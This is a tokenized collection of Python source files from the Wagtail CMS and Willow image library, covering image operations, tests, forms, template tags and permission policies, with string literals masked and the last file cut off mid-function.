<s> from __future__ import absolute_import <EOL> from willow . image import ( <EOL> Image , <EOL> JPEGImageFile , <EOL> PNGImageFile , <EOL> GIFImageFile , <EOL> BMPImageFile , <EOL> RGBImageBuffer , <EOL> RGBAImageBuffer , <EOL> ) <EOL> def _PIL_Image ( ) : <EOL> import PIL . Image <EOL> return PIL . Image <EOL> class PillowImage ( Image ) : <EOL> def __init__ ( self , image ) : <EOL> self . image = image <EOL> @ classmethod <EOL> def check ( cls ) : <EOL> _PIL_Image ( ) <EOL> @ Image . operation <EOL> def get_size ( self ) : <EOL> return self . image . size <EOL> @ Image . operation <EOL> def has_alpha ( self ) : <EOL> img = self . image <EOL> return img . mode in ( '<STR_LIT>' , '<STR_LIT>' ) or ( img . mode == '<STR_LIT:P>' and '<STR_LIT>' in img . info ) <EOL> @ Image . operation <EOL> def has_animation ( self ) : <EOL> return False <EOL> @ Image . operation <EOL> def resize ( self , size ) : <EOL> if self . image . mode in [ '<STR_LIT:1>' , '<STR_LIT:P>' ] : <EOL> if self . has_alpha ( ) : <EOL> image = self . image . convert ( '<STR_LIT>' ) <EOL> else : <EOL> image = self . image . convert ( '<STR_LIT>' ) <EOL> else : <EOL> image = self . image <EOL> return PillowImage ( image . resize ( size , _PIL_Image ( ) . ANTIALIAS ) ) <EOL> @ Image . operation <EOL> def crop ( self , rect ) : <EOL> return PillowImage ( self . image . crop ( rect ) ) <EOL> @ Image . operation <EOL> def save_as_jpeg ( self , f , quality = <NUM_LIT> ) : <EOL> if self . image . mode in [ '<STR_LIT:1>' , '<STR_LIT:P>' ] : <EOL> image = self . image . convert ( '<STR_LIT>' ) <EOL> else : <EOL> image = self . image <EOL> image . save ( f , '<STR_LIT>' , quality = quality ) <EOL> return JPEGImageFile ( f ) <EOL> @ Image . operation <EOL> def save_as_png ( self , f ) : <EOL> self . image . save ( f , '<STR_LIT>' ) <EOL> return PNGImageFile ( f ) <EOL> @ Image . operation <EOL> def save_as_gif ( self , f ) : <EOL> image = self . image <EOL> if image . mode not in [ '<STR_LIT:L>' , '<STR_LIT:P>' ] : <EOL> image = image . convert ( '<STR_LIT:P>' , palette = _PIL_Image ( ) . ADAPTIVE ) <EOL> if '<STR_LIT>' in image . info : <EOL> image . save ( f , '<STR_LIT>' , transparency = image . info [ '<STR_LIT>' ] ) <EOL> else : <EOL> image . save ( f , '<STR_LIT>' ) <EOL> return GIFImageFile ( f ) <EOL> @ Image . operation <EOL> def auto_orient ( self ) : <EOL> image = self . image <EOL> if hasattr ( image , '<STR_LIT>' ) : <EOL> try : <EOL> exif = image . _getexif ( ) <EOL> except Exception : <EOL> exif = None <EOL> if exif is not None : <EOL> orientation = exif . get ( <NUM_LIT> , <NUM_LIT:1> ) <EOL> if <NUM_LIT:1> <= orientation <= <NUM_LIT:8> : <EOL> Image = _PIL_Image ( ) <EOL> ORIENTATION_TO_TRANSPOSE = { <EOL> <NUM_LIT:1> : ( ) , <EOL> <NUM_LIT:2> : ( Image . FLIP_LEFT_RIGHT , ) , <EOL> <NUM_LIT:3> : ( Image . ROTATE_180 , ) , <EOL> <NUM_LIT:4> : ( Image . ROTATE_180 , Image . FLIP_LEFT_RIGHT ) , <EOL> <NUM_LIT:5> : ( Image . ROTATE_270 , Image . FLIP_LEFT_RIGHT ) , <EOL> <NUM_LIT:6> : ( Image . ROTATE_270 , ) , <EOL> <NUM_LIT:7> : ( Image . ROTATE_90 , Image . FLIP_LEFT_RIGHT ) , <EOL> <NUM_LIT:8> : ( Image . ROTATE_90 , ) , <EOL> } <EOL> for transpose in ORIENTATION_TO_TRANSPOSE [ orientation ] : <EOL> image = image . transpose ( transpose ) <EOL> return PillowImage ( image ) <EOL> @ Image . operation <EOL> def get_pillow_image ( self ) : <EOL> return self . image <EOL> @ classmethod <EOL> @ Image . converter_from ( JPEGImageFile ) <EOL> @ Image . converter_from ( PNGImageFile ) <EOL> @ Image . converter_from ( GIFImageFile , cost = <NUM_LIT:200> ) <EOL> @ Image . converter_from ( BMPImageFile ) <EOL> def open ( cls , image_file ) : <EOL> image_file . f . seek ( <NUM_LIT:0> ) <EOL> image = _PIL_Image ( ) . open ( image_file . f ) <EOL> image . load ( ) <EOL> return cls ( image ) <EOL> @ Image . converter_to ( RGBImageBuffer ) <EOL> def to_buffer_rgb ( self ) : <EOL> image = self . image <EOL> if image . mode != '<STR_LIT>' : <EOL> image = image . convert ( '<STR_LIT>' ) <EOL> return RGBImageBuffer ( image . size , image . tobytes ( ) ) <EOL> @ Image . converter_to ( RGBAImageBuffer ) <EOL> def to_buffer_rgba ( self ) : <EOL> image = self . image <EOL> if image . mode != '<STR_LIT>' : <EOL> image = image . convert ( '<STR_LIT>' ) <EOL> return RGBAImageBuffer ( image . size , image . tobytes ( ) ) <EOL> willow_image_classes = [ PillowImage ] </s>
<s> import sys <EOL> import os <EOL> on_rtd = os . environ . get ( '<STR_LIT>' , None ) == '<STR_LIT:True>' <EOL> if not on_rtd : <EOL> import sphinx_rtd_theme <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> from wagtail . wagtailcore import __version__ <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> import django <EOL> django . setup ( ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> if not on_rtd : <EOL> extensions . append ( '<STR_LIT>' ) <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = __version__ <EOL> release = __version__ <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> spelling_lang = '<STR_LIT>' <EOL> spelling_word_list_filename = '<STR_LIT>' <EOL> html_logo = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django import forms <EOL> from django . core . urlresolvers import reverse <EOL> from wagtail . wagtailcore . models import Site <EOL> class SiteSwitchForm ( forms . Form ) : <EOL> site = forms . ChoiceField ( choices = [ ] ) <EOL> class Media : <EOL> js = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> def __init__ ( self , current_site , model , ** kwargs ) : <EOL> initial_data = { '<STR_LIT>' : self . get_change_url ( current_site , model ) } <EOL> super ( SiteSwitchForm , self ) . __init__ ( initial = initial_data , ** kwargs ) <EOL> sites = [ ( self . get_change_url ( site , model ) , site ) <EOL> for site in Site . objects . all ( ) ] <EOL> self . fields [ '<STR_LIT>' ] . choices = sites <EOL> @ classmethod <EOL> def get_change_url ( cls , site , model ) : <EOL> return reverse ( '<STR_LIT>' , args = [ <EOL> model . _meta . app_label , model . _meta . model_name , site . pk ] ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . test import TestCase <EOL> from django . test . utils import override_settings <EOL> from wagtail . contrib . wagtailfrontendcache . backends import ( <EOL> BaseBackend , CloudflareBackend , HTTPBackend ) <EOL> from wagtail . contrib . wagtailfrontendcache . utils import get_backends <EOL> from wagtail . tests . testapp . models import EventIndex <EOL> from wagtail . wagtailcore . models import Page <EOL> class TestBackendConfiguration ( TestCase ) : <EOL> def test_default ( self ) : <EOL> backends = get_backends ( ) <EOL> self . assertEqual ( len ( backends ) , <NUM_LIT:0> ) <EOL> def test_varnish ( self ) : <EOL> backends = get_backends ( backend_settings = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . assertEqual ( set ( backends . keys ( ) ) , set ( [ '<STR_LIT>' ] ) ) <EOL> self . assertIsInstance ( backends [ '<STR_LIT>' ] , HTTPBackend ) <EOL> self . assertEqual ( backends [ '<STR_LIT>' ] . cache_scheme , '<STR_LIT:http>' ) <EOL> self . assertEqual ( backends [ '<STR_LIT>' ] . cache_netloc , '<STR_LIT>' ) <EOL> def test_cloudflare ( self ) : <EOL> backends = get_backends ( backend_settings = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . assertEqual ( set ( backends . keys ( ) ) , set ( [ '<STR_LIT>' ] ) ) <EOL> self . assertIsInstance ( backends [ '<STR_LIT>' ] , CloudflareBackend ) <EOL> self . assertEqual ( backends [ '<STR_LIT>' ] . cloudflare_email , '<STR_LIT>' ) <EOL> self . assertEqual ( backends [ '<STR_LIT>' ] . cloudflare_token , '<STR_LIT>' ) <EOL> def test_multiple ( self ) : <EOL> backends = get_backends ( backend_settings = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } ) <EOL> self . assertEqual ( set ( backends . keys ( ) ) , set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> def test_filter ( self ) : <EOL> backends = get_backends ( backend_settings = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } , backends = [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( set ( backends . keys ( ) ) , set ( [ '<STR_LIT>' ] ) ) <EOL> @ override_settings ( WAGTAILFRONTENDCACHE_LOCATION = '<STR_LIT>' ) <EOL> def test_backwards_compatibility ( self ) : <EOL> backends = get_backends ( ) <EOL> self . assertEqual ( set ( backends . keys ( ) ) , set ( [ '<STR_LIT:default>' ] ) ) <EOL> self . assertIsInstance ( backends [ '<STR_LIT:default>' ] , HTTPBackend ) <EOL> self . assertEqual ( backends [ '<STR_LIT:default>' ] . cache_scheme , '<STR_LIT:http>' ) <EOL> self . assertEqual ( backends [ '<STR_LIT:default>' ] . cache_netloc , '<STR_LIT>' ) <EOL> PURGED_URLS = [ ] <EOL> class MockBackend ( BaseBackend ) : <EOL> def __init__ ( self , config ) : <EOL> pass <EOL> def purge ( self , url ) : <EOL> PURGED_URLS . append ( url ) <EOL> @ override_settings ( WAGTAILFRONTENDCACHE = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> class TestCachePurging ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def test_purge_on_publish ( self ) : <EOL> PURGED_URLS [ : ] = [ ] <EOL> page = EventIndex . objects . get ( url_path = '<STR_LIT>' ) <EOL> page . save_revision ( ) . publish ( ) <EOL> self . assertEqual ( PURGED_URLS , [ '<STR_LIT>' ] ) <EOL> def test_purge_on_unpublish ( self ) : <EOL> PURGED_URLS [ : ] = [ ] <EOL> page = EventIndex . objects . get ( url_path = '<STR_LIT>' ) <EOL> page . unpublish ( ) <EOL> self . assertEqual ( PURGED_URLS , [ '<STR_LIT>' ] ) <EOL> def test_purge_with_unroutable_page ( self ) : <EOL> PURGED_URLS [ : ] = [ ] <EOL> root = Page . objects . get ( url_path = '<STR_LIT:/>' ) <EOL> page = EventIndex ( title = '<STR_LIT>' ) <EOL> root . add_child ( instance = page ) <EOL> page . save_revision ( ) . publish ( ) <EOL> self . assertEqual ( PURGED_URLS , [ ] ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . core . urlresolvers import reverse <EOL> from django . test import TestCase <EOL> from wagtail . tests . utils import WagtailTestUtils <EOL> class TestStyleGuide ( TestCase , WagtailTestUtils ) : <EOL> def setUp ( self ) : <EOL> self . login ( ) <EOL> def test_styleguide ( self ) : <EOL> response = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertTemplateUsed ( response , '<STR_LIT>' ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . http import HttpResponse <EOL> from wagtail . contrib . wagtailroutablepage . models import RoutablePage , route <EOL> def routable_page_external_view ( request , arg = "<STR_LIT>" ) : <EOL> return HttpResponse ( "<STR_LIT>" + arg ) <EOL> class RoutablePageTest ( RoutablePage ) : <EOL> @ route ( r'<STR_LIT>' ) <EOL> def main ( self , request ) : <EOL> return HttpResponse ( "<STR_LIT>" ) <EOL> @ route ( r'<STR_LIT>' ) <EOL> def archive_by_year ( self , request , year ) : <EOL> return HttpResponse ( "<STR_LIT>" + str ( year ) ) <EOL> @ route ( r'<STR_LIT>' ) <EOL> def archive_by_author ( self , request , author_slug ) : <EOL> return HttpResponse ( "<STR_LIT>" + author_slug ) <EOL> @ route ( r'<STR_LIT>' ) <EOL> @ route ( r'<STR_LIT>' ) <EOL> def external_view ( self , * args , ** kwargs ) : <EOL> return routable_page_external_view ( * args , ** kwargs ) <EOL> @ route ( r'<STR_LIT>' , name = '<STR_LIT>' ) <EOL> def override_name_test ( self , request ) : <EOL> pass </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import sys <EOL> import warnings <EOL> from contextlib import contextmanager <EOL> import django <EOL> from django . contrib . auth import get_user_model <EOL> from django . core . urlresolvers import reverse <EOL> from django . test import TestCase <EOL> from django . utils import six <EOL> from django . utils . text import slugify <EOL> class WagtailTestUtils ( object ) : <EOL> @ staticmethod <EOL> def create_test_user ( ) : <EOL> """<STR_LIT>""" <EOL> user_model = get_user_model ( ) <EOL> user_data = dict ( ) <EOL> user_data [ user_model . USERNAME_FIELD ] = '<STR_LIT>' <EOL> user_data [ '<STR_LIT:password>' ] = '<STR_LIT:password>' <EOL> for field in user_model . REQUIRED_FIELDS : <EOL> user_data [ field ] = field <EOL> return user_model . objects . create_superuser ( ** user_data ) <EOL> def login ( self ) : <EOL> user = self . create_test_user ( ) <EOL> user_model = get_user_model ( ) <EOL> self . assertTrue ( <EOL> self . client . login ( password = '<STR_LIT:password>' , ** { user_model . USERNAME_FIELD : '<STR_LIT>' } ) <EOL> ) <EOL> return user <EOL> def assertRegex ( self , * args , ** kwargs ) : <EOL> six . assertRegex ( self , * args , ** kwargs ) <EOL> @ staticmethod <EOL> @ contextmanager <EOL> def ignore_deprecation_warnings ( ) : <EOL> with warnings . catch_warnings ( record = True ) as warning_list : <EOL> yield <EOL> for w in warning_list : <EOL> if not issubclass ( w . category , ( DeprecationWarning , PendingDeprecationWarning ) ) : <EOL> warnings . showwarning ( <EOL> message = w . message , <EOL> category = w . category , <EOL> filename = w . filename , <EOL> lineno = w . lineno , <EOL> file = w . file , <EOL> line = w . line <EOL> ) <EOL> @ staticmethod <EOL> def reset_warning_registry ( ) : <EOL> """<STR_LIT>""" <EOL> key = "<STR_LIT>" <EOL> for mod in list ( sys . modules . values ( ) ) : <EOL> if hasattr ( mod , key ) : <EOL> getattr ( mod , key ) . clear ( ) <EOL> class WagtailPageTests ( WagtailTestUtils , TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( WagtailPageTests , self ) . setUp ( ) <EOL> self . login ( ) <EOL> def _testCanCreateAt ( self , parent_model , child_model ) : <EOL> return child_model in parent_model . allowed_subpage_models ( ) <EOL> def assertCanCreateAt ( self , parent_model , child_model , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if not self . _testCanCreateAt ( parent_model , child_model ) : <EOL> msg = self . _formatMessage ( msg , "<STR_LIT>" % ( <EOL> child_model . _meta . app_label , child_model . _meta . model_name , <EOL> parent_model . _meta . app_label , parent_model . _meta . model_name ) ) <EOL> raise self . failureException ( msg ) <EOL> def assertCanNotCreateAt ( self , parent_model , child_model , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if self . _testCanCreateAt ( parent_model , child_model ) : <EOL> msg = self . _formatMessage ( msg , "<STR_LIT>" % ( <EOL> child_model . _meta . app_label , child_model . _meta . model_name , <EOL> parent_model . _meta . app_label , parent_model . _meta . model_name ) ) <EOL> raise self . failureException ( msg ) <EOL> def assertCanCreate ( self , parent , child_model , data , msg = None ) : <EOL> """<STR_LIT>""" <EOL> self . assertCanCreateAt ( parent . specific_class , child_model ) <EOL> if '<STR_LIT>' not in data and '<STR_LIT:title>' in data : <EOL> data [ '<STR_LIT>' ] = slugify ( data [ '<STR_LIT:title>' ] ) <EOL> data [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> add_url = reverse ( '<STR_LIT>' , args = [ <EOL> child_model . _meta . app_label , child_model . _meta . model_name , parent . pk ] ) <EOL> response = self . client . post ( add_url , data , follow = True ) <EOL> if response . status_code != <NUM_LIT:200> : <EOL> msg = self . _formatMessage ( msg , '<STR_LIT>' % ( <EOL> child_model . _meta . app_label , child_model . _meta . model_name , response . status_code ) ) <EOL> raise self . failureException ( msg ) <EOL> if response . redirect_chain == [ ] : <EOL> if '<STR_LIT>' not in response . context : <EOL> msg = self . _formatMessage ( msg , '<STR_LIT>' ) <EOL> raise self . failureException ( msg ) <EOL> form = response . context [ '<STR_LIT>' ] <EOL> if not form . errors : <EOL> msg = self . _formatMessage ( msg , '<STR_LIT>' ) <EOL> raise self . failureException ( msg ) <EOL> errors = '<STR_LIT:\n>' . join ( '<STR_LIT>' % ( field , '<STR_LIT>' . join ( errors ) ) <EOL> for field , errors in sorted ( form . errors . items ( ) ) ) <EOL> msg = self . _formatMessage ( msg , '<STR_LIT>' % ( <EOL> child_model . _meta . app_label , child_model . _meta . model_name , errors ) ) <EOL> raise self . failureException ( msg ) <EOL> if django . VERSION >= ( <NUM_LIT:1> , <NUM_LIT:9> ) : <EOL> explore_url = reverse ( '<STR_LIT>' , args = [ parent . pk ] ) <EOL> else : <EOL> explore_url = '<STR_LIT>' + reverse ( '<STR_LIT>' , args = [ parent . pk ] ) <EOL> if response . redirect_chain != [ ( explore_url , <NUM_LIT> ) ] : <EOL> msg = self . _formatMessage ( msg , '<STR_LIT>' % ( <EOL> child_model . _meta . app_label , child_model . _meta . model_name , <EOL> response . redirect_chain ) ) <EOL> raise self . failureException ( msg ) <EOL> def assertAllowedSubpageTypes ( self , parent_model , child_models , msg = None ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> set ( parent_model . allowed_subpage_models ( ) ) , <EOL> set ( child_models ) , <EOL> msg = msg ) <EOL> def assertAllowedParentPageTypes ( self , child_model , parent_models , msg = None ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> set ( child_model . allowed_parent_page_models ( ) ) , <EOL> set ( parent_models ) , <EOL> msg = msg ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import hashlib <EOL> from django import template <EOL> from django . utils . six . moves . urllib . parse import urlencode <EOL> register = template . Library ( ) <EOL> class GravatarUrlNode ( template . Node ) : <EOL> def __init__ ( self , email , size = <NUM_LIT:50> ) : <EOL> self . email = template . Variable ( email ) <EOL> self . size = size <EOL> def render ( self , context ) : <EOL> try : <EOL> email = self . email . resolve ( context ) <EOL> except template . VariableDoesNotExist : <EOL> return '<STR_LIT>' <EOL> default = "<STR_LIT:blank>" <EOL> size = int ( self . size ) * <NUM_LIT:2> <EOL> gravatar_url = "<STR_LIT>" . format ( <EOL> hash = hashlib . md5 ( email . lower ( ) . encode ( '<STR_LIT:utf-8>' ) ) . hexdigest ( ) , <EOL> params = urlencode ( { '<STR_LIT:s>' : size , '<STR_LIT:d>' : default } ) <EOL> ) <EOL> return gravatar_url <EOL> @ register . tag <EOL> def gravatar_url ( parser , token ) : <EOL> bits = token . split_contents ( ) <EOL> return GravatarUrlNode ( * bits [ <NUM_LIT:1> : ] ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . http import JsonResponse <EOL> from taggit . models import Tag <EOL> def autocomplete ( request ) : <EOL> term = request . GET . get ( '<STR_LIT>' , None ) <EOL> if term : <EOL> tags = Tag . objects . filter ( name__istartswith = term ) . order_by ( '<STR_LIT:name>' ) <EOL> else : <EOL> tags = Tag . objects . none ( ) <EOL> return JsonResponse ( [ tag . name for tag in tags ] , safe = False ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( <EOL> max_length = <NUM_LIT:20> , <EOL> choices = [ <EOL> ( b'<STR_LIT>' , b'<STR_LIT>' ) , <EOL> ( b'<STR_LIT>' , b'<STR_LIT>' ) , <EOL> ( b'<STR_LIT>' , b'<STR_LIT>' ) <EOL> ] <EOL> ) , <EOL> ) , <EOL> migrations . AlterUniqueTogether ( <EOL> name = '<STR_LIT>' , <EOL> unique_together = set ( [ ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ] ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . contrib . auth import get_user_model <EOL> from django . contrib . auth . models import Permission <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . core . exceptions import FieldDoesNotExist , ImproperlyConfigured <EOL> from django . db . models import Q <EOL> from django . utils . functional import cached_property <EOL> class BasePermissionPolicy ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model ) : <EOL> self . model = model <EOL> def user_has_permission ( self , user , action ) : <EOL> """<STR_LIT>""" <EOL> return ( user in self . users_with_permission ( action ) ) <EOL> def user_has_any_permission ( self , user , actions ) : <EOL> """<STR_LIT>""" <EOL> return any ( self . user_has_permission ( user , action ) for action in actions ) <EOL> def users_with_any_permission ( self , actions ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def users_with_permission ( self , action ) : <EOL> """<STR_LIT>""" <EOL> return self . users_with_any_permission ( [ action ] ) <EOL> def user_has_permission_for_instance ( self , user , action , instance ) : <EOL> """<STR_LIT>""" <EOL> return self . user_has_permission ( user , action ) <EOL> def user_has_any_permission_for_instance ( self , user , actions , instance ) : <EOL> """<STR_LIT>""" <EOL> return any ( <EOL> self . user_has_permission_for_instance ( user , action , instance ) <EOL> for action in actions <EOL> ) <EOL> def instances_user_has_any_permission_for ( self , user , actions ) : <EOL> """<STR_LIT>""" <EOL> if self . user_has_any_permission ( user , actions ) : <EOL> return self . model . objects . all ( ) <EOL> else : <EOL> return self . model . objects . none ( ) <EOL> def instances_user_has_permission_for ( self , user , action ) : <EOL> """<STR_LIT>""" <EOL> return self . instances_user_has_any_permission_for ( user , [ action ] ) <EOL> def users_with_any_permission_for_instance ( self , actions , instance ) : <EOL> """<STR_LIT>""" <EOL> return self . users_with_any_permission ( actions ) <EOL> def users_with_permission_for_instance ( self , action , instance ) : <EOL> return self . users_with_any_permission_for_instance ( [ action ] , instance ) <EOL> class BlanketPermissionPolicy ( BasePermissionPolicy ) : <EOL> """<STR_LIT>""" <EOL> def user_has_permission ( self , user , action ) : <EOL> return True <EOL> def user_has_any_permission ( self , user , actions ) : <EOL> return True <EOL> def users_with_any_permission ( self , actions ) : <EOL> return get_user_model ( ) . objects . filter ( is_active = True ) <EOL> def users_with_permission ( self , action ) : <EOL> return get_user_model ( ) . objects . filter ( is_active = True ) <EOL> class AuthenticationOnlyPermissionPolicy ( BasePermissionPolicy ) : <EOL> """<STR_LIT>""" <EOL> def user_has_permission ( self , user , action ) : <EOL> return user . is_authenticated ( ) and user . is_active <EOL> def user_has_any_permission ( self , user , actions ) : <EOL> return user . is_authenticated ( ) and user . is_active <EOL> def users_with_any_permission ( self , actions ) : <EOL> return get_user_model ( ) . objects . filter ( is_active = True ) <EOL> def users_with_permission ( self , action ) : <EOL> return get_user_model ( ) . objects . filter ( is_active = True ) <EOL> class BaseDjangoAuthPermissionPolicy ( BasePermissionPolicy ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model , auth_model = None ) : <EOL> super ( BaseDjangoAuthPermissionPolicy , self ) . __init__ ( model ) <EOL> self . auth_model = auth_model or self . model <EOL> self . app_label = self . auth_model . _meta . app_label <EOL> self . model_name = self . auth_model . _meta . model_name <EOL> @ cached_property <EOL> def _content_type ( self ) : <EOL> return ContentType . objects . get_for_model ( self . auth_model ) <EOL> def _get_permission_name ( self , action ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( self . app_label , action , self . model_name ) <EOL> def _get_users_with_any_permission_codenames_filter ( self , permission_codenames ) : <EOL> """<STR_LIT>""" <EOL> permissions = Permission . objects . filter ( <EOL> content_type = self . _content_type , <EOL> codename__in = permission_codenames <EOL> ) <EOL> return ( <EOL> Q ( is_superuser = True ) | <EOL> Q ( user_permissions__in = permissions ) | <EOL> Q ( groups__permissions__in = permissions ) <EOL> ) & Q ( is_active = True ) <EOL> def _get_users_with_any_permission_codenames ( self , permission_codenames ) : <EOL> """<STR_LIT>""" <EOL> filter_expr = self . _get_users_with_any_permission_codenames_filter ( permission_codenames ) <EOL> return get_user_model ( ) . objects . filter ( filter_expr ) . distinct ( ) <EOL> class ModelPermissionPolicy ( BaseDjangoAuthPermissionPolicy ) : <EOL> """<STR_LIT>""" <EOL> def user_has_permission ( self , user , action ) : <EOL> return user . has_perm ( self . _get_permission_name ( action ) ) <EOL> def users_with_any_permission ( self , actions ) : <EOL> permission_codenames = [ <EOL> '<STR_LIT>' % ( action , self . model_name ) <EOL> for action in actions <EOL> ] <EOL> return self . _get_users_with_any_permission_codenames ( permission_codenames ) <EOL> class OwnershipPermissionPolicy ( BaseDjangoAuthPermissionPolicy ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model , auth_model = None , owner_field_name = '<STR_LIT>' ) : <EOL> super ( OwnershipPermissionPolicy , self ) . __init__ ( model , auth_model = auth_model ) <EOL> self . owner_field_name = owner_field_name <EOL> try : <EOL> self . model . _meta . get_field ( self . owner_field_name ) <EOL> except FieldDoesNotExist : <EOL> raise ImproperlyConfigured ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( self . model , self . owner_field_name ) <EOL> ) <EOL> def user_has_permission ( self , user , action ) : <EOL> if action == '<STR_LIT>' : <EOL> return user . has_perm ( self . _get_permission_name ( '<STR_LIT>' ) ) <EOL> elif action == '<STR_LIT>' or action == '<STR_LIT>' : <EOL> return ( <EOL> user . has_perm ( self . _get_permission_name ( '<STR_LIT>' ) ) or <EOL> user . has_perm ( self . _get_permission_name ( '<STR_LIT>' ) ) <EOL> ) <EOL> else : <EOL> return user . is_active and user . is_superuser <EOL> def users_with_any_permission ( self , actions ) : <EOL> if '<STR_LIT>' in actions or '<STR_LIT>' in actions : <EOL> permission_codenames = [ <EOL> '<STR_LIT>' % self . model_name , <EOL> '<STR_LIT>' % self . model_name <EOL> ] <EOL> elif '<STR_LIT>' in actions : <EOL> permission_codenames = [ <EOL> '<STR_LIT>' % self . model_name , <EOL> ] <EOL> else : <EOL> return get_user_model ( ) . objects . filter ( is_active = True , is_superuser = True ) <EOL> return self . _get_users_with_any_permission_codenames ( permission_codenames ) <EOL> def user_has_permission_for_instance ( self , user , action , instance ) : <EOL> return self . user_has_any_permission_for_instance ( user , [ action ] , instance ) <EOL> def user_has_any_permission_for_instance ( self , user , actions , instance ) : <EOL> if '<STR_LIT>' in actions or '<STR_LIT>' in actions : <EOL> if user . has_perm ( self . _get_permission_name ( '<STR_LIT>' ) ) : <EOL> return True <EOL> elif ( <EOL> user . has_perm ( self . _get_permission_name ( '<STR_LIT>' ) ) and <EOL> getattr ( instance , self . owner_field_name ) == user <EOL> ) : <EOL> return True <EOL> else : <EOL> return False <EOL> else : <EOL> return user . is_active and user . is_superuser <EOL> def instances_user_has_any_permission_for ( self , user , actions ) : <EOL> if user . is_active and user . is_superuser : <EOL> return self . model . objects . all ( ) <EOL> elif '<STR_LIT>' in actions or '<STR_LIT>' in actions : <EOL> if user . has_perm ( self . _get_permission_name ( '<STR_LIT>' ) ) : <EOL> return self . model . objects . all ( ) <EOL> elif user . has_perm ( self . _get_permission_name ( '<STR_LIT>' ) ) : <EOL> return self . model . objects . filter ( ** { self . owner_field_name : user } ) <EOL> else : <EOL> return self . model . objects . none ( ) <EOL> else : <EOL> return self . model . objects . none ( ) <EOL> def users_with_any_permission_for_instance ( self , actions , instance ) : <EOL> if '<STR_LIT>' in actions or '<STR_LIT>' in actions : <EOL> filter_expr = self . _get_users_with_any_permission_codenames_filter ( [ <EOL> '<STR_LIT>' % self . model_name <EOL> ] ) <EOL> 